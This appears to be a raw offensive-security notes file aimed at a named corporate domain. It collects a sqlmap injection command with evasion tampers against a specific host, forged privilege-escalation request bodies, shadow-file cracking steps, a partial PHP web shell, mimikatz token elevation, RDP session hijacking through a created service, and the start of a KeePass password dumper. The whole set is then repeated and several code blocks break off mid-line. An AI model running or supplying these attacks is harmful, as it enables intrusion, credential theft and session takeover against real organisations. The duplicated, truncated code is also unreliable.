c0d3x27 c0d3x27

## modified body to PE
{ "id":
"username":"c0d3x27@corp.tesla.eu"
"email":"teslaemployeeemail@tesla.eu
"active":true,
"registered":"Fidel C."
"role":"03"
"site":[
],
"company":[
]

## modified body
{
"name": "HELLKO"
"account": "jkk"
"active": "true"
}

## sqlmap
sqlmap -u https://documents.tesla.eu/busydoc.dc?id= --banner --random-agent -v 3 --tamper="apostrophemask,apostrophenullencode,between,chardoubleencode,charencode,charunicodeencode" --level=5 --risk=3 --dbms=mysql --current-db --current-user

The more information you feel the command the better it can perform

## backdoors
kali@kali:~$ unshadow passwd.txt shadow.txt
kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt

## Get in
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {

## rdp
mimikatz # ts::remote /id:1                                       #This will fail if you didnt started the session as SYSTEM
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

640     {0;000003e7} 0 D 35719          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,31p)       Primary
 -> Impersonated !

## drp1
mimikatz # ts::sessions

Session: 1 - RDP-Tcp#0
  state: Active (0)
  user : Administrator @ hacklab
  Conn : 9/25/2021 2:09:14 AM
  disc : 9/25/2021 2:09:13 AM
  logon: 9/25/2021 12:35:03 AM
  last : 9/25/2021 6:45:06 AM
  curr : 9/25/2021 6:48:11 AM

## gist:3f2d56b87c74e3bbdeaaeb1186508a32
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#2"
net start sesshijack

## Program.cs
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;

namespace keepass_password_dumper
{
    internal static class Program
    {
        private const string AllowedChars = "^[\x20-\x7E]+$";
        private const int BufferSize = 524288;

## cmd.exe
dotnet run c:\test\KeePass.DMP
	{ "id":
	"username":"c0d3x27@corp.tesla.eu"
	"email":"teslaemployeeemail@tesla.eu
	"active":true,
	"registered":"Fidel C."
	"role":"03"
	"site":[
	],
	"company":[
	]
	sqlmap -u https://documents.tesla.eu/busydoc.dc?id= --banner --random-agent -v 3 --tamper="apostrophemask,apostrophenullencode,between,chardoubleencode,charencode,charunicodeencode" --level=5 --risk=3 --dbms=mysql --current-db --current-user

	The more information you feel the command the better it can perform
	kali@kali:~$ unshadow passwd.txt shadow.txt
	kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt
	<html>
	<body>
	<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
	<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
	<input type="SUBMIT" value="Execute">
	</form>
	<pre>
	<?php
	if(isset($_GET['cmd']))
	{
	mimikatz # ts::remote /id:1 #This will fail if you didnt started the session as SYSTEM
	mimikatz # privilege::debug
	Privilege '20' OK
	mimikatz # token::elevate
	Token Id : 0
	User name :
	SID name : NT AUTHORITY\SYSTEM

	640 {0;000003e7} 0 D 35719 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
	-> Impersonated !
	mimikatz # ts::sessions

	Session: 1 - RDP-Tcp#0
	state: Active (0)
	user : Administrator @ hacklab
	Conn : 9/25/2021 2:09:14 AM
	disc : 9/25/2021 2:09:13 AM
	logon: 9/25/2021 12:35:03 AM
	last : 9/25/2021 6:45:06 AM
	curr : 9/25/2021 6:48:11 AM
	sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#2"
	net start sesshijack
	using System.Runtime.InteropServices;
	using System.Text.RegularExpressions;

	namespace keepass_password_dumper
	{
	internal static class Program
	{
	private const string AllowedChars = "^[\x20-\x7E]+$";
	private const int BufferSize = 524288;